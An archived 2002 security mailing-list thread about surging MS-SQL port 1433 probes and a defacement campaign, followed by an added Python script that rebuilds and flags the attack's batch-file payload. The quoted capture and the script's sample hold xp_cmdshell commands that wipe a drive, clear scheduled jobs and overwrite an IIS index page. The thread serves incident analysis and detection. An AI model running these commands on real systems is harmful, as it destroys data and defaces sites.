-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SQL probe reports to DShield skyrocketed today. It looks like a small
number of sources scanning large IP ranges one after another.

http://www.dshield.org/port_report.php?port=1433

On Fri, 3 May 2002, Brenna Primrose wrote:

> I saw SQL probes today on several of our systems from wanadoo.fr --
> coincidence? I think not. Wanadoo.fr is infamous for looking for FTP
> servers to crack. Hmmm...
>
>
> AIM - abosolut x psycho
> Yahoo! - absolut_contagion
> ICQ - 1363187
> http://gsa.creighton.edu
> http://profiles.yahoo.com/absolut_contagion
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.12
> GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+
> O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+
> G e* h- r++ x+
> ------END GEEK CODE BLOCK------
>
> -----Original Message-----
> From: Steve Zenone [mailto:zenoneat_private]
> Sent: Thursday, May 02, 2002 10:24 PM
> To: incidentsat_private
> Cc: thompsonat_private
> Subject: RE: Windows Systems Defaced
>
> Hello,
>
> Stephen W. Thompson wrote:
> |> Have any of you seen similar activity? Any thoughts?
> |
> |Yes, we had one that matches most of your details. These
> |are exact matches:
> |
> |> [] Damage occurred around 1600 on 5/1/2002
> |BUT=> (approx. 16:00 EDT for us)
> |> [] Win-popup message with "F---ing University of Rochester"
> |> -- NOTE: not all systems running IIS
> |> [] Admins claimed that all systems were patched correctly
> |> [] Most were running updated and current AV
>
> Thank you very much for your reply - it definitely helps!
>
> We have been seeing MS-SQL (1433/tcp) attacks that try and execute
> the following:
>
> -----BEGIN SNIPPET-----
> xp_cmdshell 'echo net send localhost F---ing University of Rochester
> rebooting... > rochester.bat'
> xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
> xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
> xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
> xp_cmdshell 'at /delete /y'
> xp_cmdshell 'echo if exist \inetpub\wwwroot\ type
> %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >>
> rochester.bat'
> -----END SNIPPET-----
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com

- --
- -------
jullrichat_private
Join http://www.DShield.org
Distributed Intrusion Detection System

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE80tptwWQP+4im9DYRAvS6AKCx/JaYmx1fI6nEn8oHCmqFoPMaBgCfRok0
LayncBWEGwAz57XdPsdeMpA=
=eakE
-----END PGP SIGNATURE-----
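The snippet Steve Zenone quotes above is not one command but a sequence of xp_cmdshell calls that assemble a batch file line by line with `echo ... >> rochester.bat`, clear the at job list, and stage a defacement of the IIS index page. When triaging such a capture, the useful artifact is the reconstructed batch file, not the individual T-SQL statements. The following Python is an added example written for this archive page; it is not code from any poster on the thread or from DShield. It works on a constructed sample capture modelled on the quoted snippet, and it assumes the `^nul` in the quoted lines was originally `^>nul` (a cmd.exe caret-escaped redirect whose `>` the mail quoting appears to have dropped); the rule names and the `Report` structure are this example's own.

```python
"""Reconstruct the OS-level payload hidden in a series of xp_cmdshell calls.

Added example for this thread; not code from any poster or from DShield.
SAMPLE_CAPTURE is constructed, modelled on the quoted snippet, and assumes
the '^nul' in the quoted text was '^>nul' (a cmd.exe caret-escaped redirect).
"""
import re
from dataclasses import dataclass, field

# One xp_cmdshell call with a single-quoted T-SQL string argument ('' escapes a quote).
XP_CMDSHELL_RE = re.compile(r"xp_cmdshell\s+'((?:[^']|'')*)'", re.IGNORECASE)
# "echo <payload> > file" or "echo <payload> >> file": the last *unescaped*
# redirect names the file being built; '^>' inside the payload is literal text.
ECHO_REDIRECT_RE = re.compile(r"^echo\s+(.*?)\s*(?<!\^)(>>|>)\s*(\S+)$", re.IGNORECASE)

# Behaviours worth flagging in the rebuilt batch file and in direct commands.
RULES = [
    ("wipe-drive",    re.compile(r"\bdel\b\s+[a-z]:\\(\s|$).*?/s\b", re.IGNORECASE)),
    ("net-send",      re.compile(r"\bnet\s+send\b", re.IGNORECASE)),
    ("clear-at-jobs", re.compile(r"\bat\s+/delete\b", re.IGNORECASE)),
    ("deface-www",    re.compile(r">\s*\S*wwwroot\\index\.html?\b", re.IGNORECASE)),
]

# Constructed sample (not real traffic), modelled on the thread's snippet.
SAMPLE_CAPTURE = r"""
xp_cmdshell 'echo net send localhost F---ing University of Rochester rebooting... > rochester.bat'
xp_cmdshell 'echo del g:\ /f /q /s ^>nul 2^>&1 >> rochester.bat'
xp_cmdshell 'echo del g:\ /f /q /s ^>nul 2^>&1 >> rochester.bat'
xp_cmdshell 'echo del g:\ /f /q /s ^>nul 2^>&1 >> rochester.bat'
xp_cmdshell 'at /delete /y'
xp_cmdshell 'echo if exist \inetpub\wwwroot\ type %systemroot%\rochester.html ^> e:\inetpub\wwwroot\index.html >> rochester.bat'
"""


@dataclass
class Report:
    call_count: int = 0                            # xp_cmdshell invocations seen
    files: dict = field(default_factory=dict)      # target file -> reconstructed lines
    direct: list = field(default_factory=list)     # commands run immediately, not echoed
    findings: list = field(default_factory=list)   # (tag, offending line) pairs


def cmd_unescape(s: str) -> str:
    """Undo cmd.exe caret escaping: '^>' -> '>', '^&' -> '&', '^|' -> '|', ..."""
    return re.sub(r"\^(.)", r"\1", s)


def analyze(capture: str) -> Report:
    """Walk every xp_cmdshell call, rebuild echoed files, flag dangerous lines."""
    rep = Report()
    for m in XP_CMDSHELL_RE.finditer(capture):
        rep.call_count += 1
        cmd = m.group(1).replace("''", "'").strip()
        em = ECHO_REDIRECT_RE.match(cmd)
        if em:
            payload, op, target = em.groups()
            lines = rep.files.setdefault(target, [])
            if op == ">":
                lines.clear()                      # '>' truncates, '>>' appends
            lines.append(cmd_unescape(payload))
        else:
            rep.direct.append(cmd)
    # Classify every direct command and every line of every rebuilt file.
    candidates = list(rep.direct) + [ln for lines in rep.files.values() for ln in lines]
    for src in candidates:
        for tag, rx in RULES:
            if rx.search(src):
                rep.findings.append((tag, src))
    return rep


if __name__ == "__main__":
    r = analyze(SAMPLE_CAPTURE)
    for name, lines in r.files.items():
        print(f"--- reconstructed {name} ---")
        print("\n".join(lines))
    print("--- run directly ---")
    print("\n".join(r.direct))
    for tag, src in r.findings:
        print(f"[{tag}] {src}")
```

The redirect regex deliberately ignores `^>`, so the `>nul 2>&1` and the `type ... > index.html` inside the echoed lines end up in the batch file rather than being mistaken for the file being written; the same caret handling is what makes the defacement rule fire on the rebuilt `if exist` line instead of on the T-SQL wrapper.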
This archive was generated by hypermail 2b30 : Fri May 03 2002 - 12:19:25 PDT